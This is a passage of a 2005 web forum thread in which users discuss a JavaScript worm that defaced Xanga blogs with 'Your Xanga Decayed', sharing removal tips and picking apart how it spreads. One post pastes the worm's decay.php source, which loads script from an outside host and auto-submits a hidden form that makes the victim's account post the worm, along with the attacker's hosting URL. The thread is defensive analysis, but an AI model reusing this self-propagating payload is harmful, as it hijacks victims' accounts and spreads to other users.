hacker? |
![]() ![]() |
hacker? |
![]()
Post
#51
|
|
![]() Im as fake as a widow's smile ;) ![]() ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 1,045 Joined: Feb 2005 Member No: 97,851 ![]() |
Okay..see this i why i said dont click it..
|
|
|
![]()
Post
#52
|
|
![]() Smile Like a Retard =D ![]() ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 1,350 Joined: Nov 2004 Member No: 63,186 ![]() |
the problem is, my xanga has no module and even if i have it, i still won't dare to click any of my friends' xanga for now....
|
|
|
![]()
Post
#53
|
|
![]() Im as fake as a widow's smile ;) ![]() ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 1,045 Joined: Feb 2005 Member No: 97,851 ![]() |
I had it, I got rid of it, all u need to do is:
1.sign in under safe mode 2. delete all of the entries that have that code |
|
|
![]()
Post
#54
|
|
![]() Wannabe Senior Member ![]() ![]() ![]() Group: Member Posts: 39 Joined: Sep 2004 Member No: 51,999 ![]() |
it really easy to get rid of it after you no how to get rid of it...your friends are nice people who need your help.
as long as your not signed in, you wont get the virus |
|
|
![]()
Post
#55
|
|
![]() Wannabe Senior Member ![]() ![]() ![]() Group: Member Posts: 39 Joined: Sep 2004 Member No: 51,999 ![]() |
|
|
|
![]()
Post
#56
|
|
Senior Member ![]() ![]() ![]() Group: Member Posts: 92 Joined: Feb 2004 Member No: 3,709 ![]() |
Okay... this is as far as I got...
This hacker created a script that he would assume most of you can't recover from. His assumption is correct to an extent. The hacked site would say "Your Xanga Decayed" and just about every comment has been converted to a random float value. If you see "Your Xanga Decayed" which you really shouldn't, that means you don't have javascript on. But if you don't have javascript on, you wouldn't have been infected. The virus will also open a site to hostultra with decay.php. This php file will record all those users who have their site "decayed". This keeps a record by having a random integer given to each user making each user unique to the database the decay.php is logging to. As far as how the infection works, it probably won't work with the decay.php gone. |
|
|
![]()
Post
#57
|
|
![]() Smile Like a Retard =D ![]() ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 1,350 Joined: Nov 2004 Member No: 63,186 ![]() |
QUOTE Okay... this is as far as I got... This hacker created a script that he would assume most of you can't recover from. His assumption is correct to an extent. The hacked site would say "Your Xanga Decayed" and just about every comment has been converted to a random float value. If you see "Your Xanga Decayed" which you really shouldn't, that means you don't have javascript on. But if you don't have javascript on, you wouldn't have been infected. The virus will also open a site to hostultra with decay.php. This php file will record all those users who have their site "decayed". This keeps a record by having a random integer given to each user making each user unique to the database the decay.php is logging to. As far as how the infection works, it probably won't work with the decay.php gone. Thanks, this is very informative. But my question is, is there anyway that we could contact people from xanga and ask them if they could get rid of the virus as a whole from the xanga community? |
|
|
![]()
Post
#58
|
|
![]() Senior Member ![]() ![]() ![]() Group: Member Posts: 34 Joined: Nov 2004 Member No: 67,550 ![]() |
QUOTE(coyote @ Feb 21 2005, 1:30 PM) If you see "Your Xanga Decayed" which you really shouldn't, that means you don't have javascript on. But if you don't have javascript on, you wouldn't have been infected. huh?? besides that, you very accurately described the virus. also, if you are logged on, the script redirects you to "new weblog entry", and creates a post that will spread the virus, and contains the words "your xanga decayed". |
|
|
![]()
Post
#59
|
|
![]() What? ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 709 Joined: Jan 2005 Member No: 92,823 ![]() |
There has to be a way to contact the Xanga people, this is really not cool. I wanted to upload my new theme today, but now I am way to scared to even go to my xanga..
![]() |
|
|
![]()
Post
#60
|
|
Senior Member ![]() ![]() ![]() Group: Member Posts: 92 Joined: Feb 2004 Member No: 3,709 ![]() |
QUOTE(hoogli @ Feb 21 2005, 1:41 PM) huh?? besides that, you very accurately described the virus. also, if you are logged on, the script redirects you to "new weblog entry", and creates a post that will spread the virus, and contains the words "your xanga decayed". forget what I said about the javascript. do you actually see a "new weblog entry" being opened? or do you see that from a source code, if it is I'd like to see it too :D |
|
|
![]()
Post
#61
|
|
![]() Senior Member ![]() ![]() ![]() Group: Member Posts: 34 Joined: Nov 2004 Member No: 67,550 ![]() |
it's in the source code. i looked.
here is the code for http://free.hostultra.com/~decay2/decay.php (DON'T CLICK THAT LINK) ...it's long <script language="JavaScript" src="/root/hostultra.php"></script> <title>Decayed</title> <center><font size=7>YOUR XANGA DECAYED</font></center> <form name="myform" method="post" action="http://www.xanga.com/private/xtools/xtoolsclassic.aspx?plain=1" id="_ctl3"><input type="hidden" name="__VIEWSTATE" value="dDwyMTM3MDU0NDg2O3Q8cDxsPFdlYmxvZ0lkO0lzUmljaFRleHQ7PjtsPGk8MD47RmFsc2U7Pj4 bDxpPDI+Oz47bDx0PHA8bDxvb script: return XagazonSearch()" type="button" value="Search »" style="DISPLAY: none" ><input name="xztitle1" type="text" id="xztitle1" style="DISPLAY: none" /><input name="xztitle2" type="text" id="xztitle2" style="DISPLAY: none" /><input name="xzasin1" id="xzasin1" type="hidden" size="2" /><input id="radAccess_0" type="radio" name="radAccess" value="1" checked="checked" style="DISPLAY: none" /><label for="radAccess_0"></label><input id="radAccess_1" type="radio" name="radAccess" value="2" style="DISPLAY: none"/><label for="radAccess_1"></label><input id="radAccess_2" type="radio" name="radAccess" value="3" style="DISPLAY: none" /><label for="radAccess_2"></label><input id="chkComments" type="checkbox" name="chkComments" checked="checked" style="DISPLAY: none" /><label for="chkComments"></label></td><input type="text" name="btnSubmit" value="Submit" id="btnSubmit" onclick="flag=2;Send();" style="display:none" /> <input name="btnCancel" id="btnCancel" type="button" value="Cancel" onclick="var x=confirm('Are you sure you want to cancel this post?');if (x==true){flag=2;window.location.href='/Private/home.aspx?user=';} else return false;" style="DISPLAY: none" /><input name="txtUserId" type="text" value="1865377" id="txtUserId" style="display:none" style="DISPLAY: none" /><input name="xbgcolor" id="xbgcolor" type="hidden" /> <input name="xbordercolor" id="xbordercolor" type="hidden" /><input name="xcontent" id="xcontent" type="hidden" /> <input id="xcopypost" name="xcopypost" type="hidden"></form><script>document.myform.submit();</script>")); |
|
|
![]()
Post
#62
|
|
![]() What? ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 709 Joined: Jan 2005 Member No: 92,823 ![]() |
whoa.. very long indeed. But now what?
![]() |
|
|
![]()
Post
#63
|
|
Senior Member ![]() ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 1,575 Joined: Jan 2005 Member No: 93,957 ![]() |
why doesn't the person who made this topic edit their first post saying not to click on it or you will get infected?
|
|
|
![]()
Post
#64
|
|
Senior Member ![]() ![]() ![]() Group: Member Posts: 92 Joined: Feb 2004 Member No: 3,709 ![]() |
QUOTE(hoogli @ Feb 21 2005, 2:01 PM) it's in the source code. i looked. here is the code for http://free.hostultra.com/~decay2/decay.php (DON'T CLICK THAT LINK) ...it's long There's the magic. That doesn't open up the new web blog entries. That fakes a form of the new web blog entries and automatically submits a new web entry. There's an easy way to prevent this script from working if Xanga haven't already figured it out by now. |
|
|
*Fallen_Fairy* |
![]()
Post
#65
|
Guest ![]() |
DON'T CLICK IT YOU FOOLS
|
|
|
![]()
Post
#66
|
|
![]() Wannabe Senior Member ![]() ![]() ![]() Group: Member Posts: 39 Joined: Sep 2004 Member No: 51,999 ![]() |
the 1st person fixed there xanga....it wont spread
|
|
|
![]()
Post
#67
|
|
![]() Senior Member ![]() ![]() ![]() ![]() Group: Member Posts: 291 Joined: Jan 2005 Member No: 89,092 ![]() |
everyone keep posting and keep this updated a few of my friends got it and im helping them i need some more info to try to stop this thanx
|
|
|
![]()
Post
#68
|
|
![]() Senior Member ![]() ![]() ![]() Group: Member Posts: 34 Joined: Nov 2004 Member No: 67,550 ![]() |
i noticed something strange... before, the decay thing was at http://free.hostultra.com/~decay/decay.php but now it's at http://free.hostultra.com/~decay2/decay.php (DON'T CLICK THIS LINK). I guess hostultra deleted the ~decay one, but how did the virus code change so that it began linking to ~decay2 instead?
P.S. - If ~decay2 gets deleted too, the guy will probably try to make a ~decay3. however, that wont happen. i made a screenname there called ~decay3 already XD |
|
|
![]()
Post
#69
|
|
![]() Wannabe Senior Member ![]() ![]() ![]() Group: Member Posts: 39 Joined: Sep 2004 Member No: 51,999 ![]() |
|
|
|
![]()
Post
#70
|
|
![]() Senior Member ![]() ![]() ![]() ![]() Group: Member Posts: 291 Joined: Jan 2005 Member No: 89,092 ![]() |
lol i dont see how that will help they will just skip to 4
|
|
|
![]()
Post
#71
|
|
![]() Wannabe Senior Member ![]() ![]() ![]() Group: Member Posts: 39 Joined: Sep 2004 Member No: 51,999 ![]() |
|
|
|
![]()
Post
#72
|
|
Senior Member ![]() ![]() ![]() Group: Member Posts: 92 Joined: Feb 2004 Member No: 3,709 ![]() |
QUOTE(yoyorks @ Feb 21 2005, 2:15 PM) It'll still spread. Worms don't work that way. As far as spreading is concerned. Please help the community. Add this to your Headers: This prevents others from infected. Not you. For the time being you should visit sites not logged in or with javascript disabled to prevent infection. |
|
|
![]()
Post
#73
|
|
![]() Senior Member ![]() ![]() ![]() ![]() Group: Member Posts: 291 Joined: Jan 2005 Member No: 89,092 ![]() |
lol sorry we posted at the same time haha
|
|
|
![]()
Post
#74
|
|
Member ![]() ![]() Group: Member Posts: 12 Joined: Jan 2005 Member No: 92,375 ![]() |
I got it too by trying to randomly prop people out of the goodness of my heart. This is the lamest thing ever. I just got it looking all prettifed.
![]() |
|
|
![]()
Post
#75
|
|
![]() Wannabe Senior Member ![]() ![]() ![]() Group: Member Posts: 39 Joined: Sep 2004 Member No: 51,999 ![]() |
![]() |
|
|
![]() ![]() |